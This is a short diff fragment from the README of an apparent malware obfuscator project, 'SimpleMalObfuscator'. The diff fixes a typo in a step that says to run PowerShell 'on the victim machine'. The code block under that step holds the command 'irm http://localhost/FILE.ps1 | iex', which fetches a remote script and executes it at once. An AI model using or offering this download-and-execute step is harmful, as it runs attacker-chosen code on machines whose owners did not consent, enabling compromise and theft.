joaostack/SimpleMalObfuscator/README.md

 And go to `bin/Release` folder.\

-Execute on victim machine powershell
+Execute on the victim machine powershell
 ```
 irm http://localhost/FILE.ps1 | iex
 ```